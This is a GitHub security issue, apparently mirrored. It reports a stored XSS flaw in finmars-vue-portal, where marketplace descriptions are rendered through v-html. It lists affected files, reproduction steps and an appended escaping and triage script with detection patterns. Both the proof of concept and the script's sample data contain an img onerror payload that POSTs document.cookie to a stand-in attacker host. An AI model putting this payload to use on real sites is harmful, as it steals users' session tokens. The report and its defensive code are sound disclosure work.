[GH-ISSUE #37] Stored XSS vulnerability in marketplace item descriptions #2

Open
opened 2026-03-03 12:00:13 +03:00 by kerem · 0 comments
Owner

Originally created by @Moltivie on GitHub (Jan 21, 2026).
Original GitHub issue: https://github.com/finmars-platform/finmars-vue-portal/issues/37

Summary

A critical stored XSS vulnerability exists in the marketplace feature that allows attackers to inject malicious JavaScript through marketplace item descriptions, which are rendered unsanitized using v-html.

Vulnerability Details

Location:
https://github.com/finmars-platform/finmars-vue-portal/blob/496d349f2cb3f3b965a90cf4576cf57020d3fc63/src/pages/marketplace/%5Bid%5D.vue#L36 (src/pages/marketplace/[id].vue, line 36)

Attack Vector

  1. Data Source: Marketplace items are fetched from external API https://marketplace.finmars.com/api/v1/configuration/{id}/
  2. Attacker Access: Anyone with marketplace publisher credentials can inject malicious content
  3. Publishing Method: Configurations are pushed via pushConfigurationToMarketplace.put endpoint with username/password authentication
  4. Execution: Malicious JavaScript executes when any user views the marketplace item

Impact

  • Stored XSS affecting all users who view the compromised marketplace item
  • Session hijacking - Authentication tokens (access_token, refresh_token, id_token) are accessible via JavaScript (cookies lack httpOnly flag)
  • Account takeover - Attacker can perform actions on behalf of victims
  • Data exfiltration - Sensitive user data can be stolen
  • Phishing - Users can be redirected to malicious sites or shown fake login forms

Proof of Concept

An attacker publishes a marketplace configuration with this description:

Great financial tool!<img src=x onerror="fetch('https://attacker.com/steal',{method:'POST',body:document.cookie})">

When victims browse to /marketplace/{id}, the payload executes and sends their authentication tokens to the attacker.

Reproduction Steps

  1. Create marketplace publisher account on marketplace.finmars.com
  2. Push a configuration with malicious HTML in the description field
  3. Navigate to the marketplace item page as a different user
  4. Observe JavaScript execution in browser console

Affected Code Path

marketplace.finmars.com API
  ↓
useApi('marketplaceItem.get') [line 251]
  ↓
item.value (no sanitization)
  ↓
matchItem computed property [line 239]
  ↓
v-html="matchItem.description" [line 36]
  ↓
XSS EXECUTION

Additional Vulnerable Locations

Similar unsanitized v-html usage found in:

  • src/components/modal/DownloadFile.vue:22,30 (CSV file preview)
  • src/components/common/FilePreview.vue:37 (File content preview)
  • src/components/Fm/UnifiedDataSelect/helper.js:8 (Search highlighting)
  • src/stores/useWhiteLabelStore.js:57,61 (Custom CSS injection)

These should be reviewed as part of a comprehensive XSS remediation effort.

Questions

  • Is this behavior intentional? Is there any backend sanitization or validation on the marketplace API that prevents malicious HTML?
  • Are there any access controls or review processes for marketplace publishers that would prevent malicious content?
  • Should HTML formatting be allowed in marketplace descriptions, or should it sanitize/escape all user-provided content?
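As an added example (not code from the finmars-vue-portal repository), the two defensive pieces a fix for the sink above would pair: escaping the description so it is rendered as text rather than through v-html, and a triage scan over already-published marketplace items for constructs that would have executed under v-html. The sample API records and the attacker.example host are constructed.

```javascript
// Added example, not code from the finmars-vue-portal repository.
// 1. escapeHtml(): what the template should do with the description
//    instead of v-html (binding with {{ }} or v-text escapes the same way).
// 2. findActiveContent(): triage helper for items already published on the
//    marketplace; flags descriptions containing constructs that would have
//    executed under v-html so they can be reviewed. A miss is not proof of
//    safety: this is a review aid, not a sanitizer.

function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructs that run script when v-html inserts them into the DOM.
const ACTIVE_PATTERNS = [
  { name: "active-element",
    re: /<\s*(script|iframe|object|embed|svg|math|link|meta|base|form)\b/i },
  { name: "event-handler", re: /\bon[a-z]+\s*=/i }, // onerror=, onload=, ...
  { name: "script-url",
    re: /\b(href|src|action|formaction)\s*=\s*["']?\s*(javascript|vbscript|data)\s*:/i },
];

// items: array of marketplace records as returned by the configuration API.
// Returns [{ id, reasons }] for every item that needs human review.
function findActiveContent(items) {
  const hits = [];
  for (const item of items) {
    const desc = String(item.description ?? "");
    const reasons = ACTIVE_PATTERNS.filter((p) => p.re.test(desc)).map((p) => p.name);
    if (reasons.length > 0) hits.push({ id: item.id, reasons });
  }
  return hits;
}

// Constructed sample of what /api/v1/configuration/{id}/ might return.
// Item 2 mirrors the proof-of-concept payload; attacker.example is a placeholder.
const SAMPLE_ITEMS = [
  { id: 1, description: "Portfolio reconciliation pack. <b>Updated 2025</b>" },
  { id: 2, description: "Great financial tool!<img src=x onerror=\"fetch('https://attacker.example/steal',"
                      + "{method:'POST',body:document.cookie})\">" },
  { id: 3, description: "Click <a href=\"javascript:alert(1)\">here</a>" },
];

const TRIAGE_REPORT = findActiveContent(SAMPLE_ITEMS);            // items 2 and 3 flagged
const SAFE_DESCRIPTION = escapeHtml(SAMPLE_ITEMS[1].description); // inert text, no tag left
```

If HTML formatting in descriptions is a product requirement, the string should go through an allow-list sanitizer such as DOMPurify before reaching v-html; the triage patterns above are for finding existing entries to review, not for deciding what is safe to render.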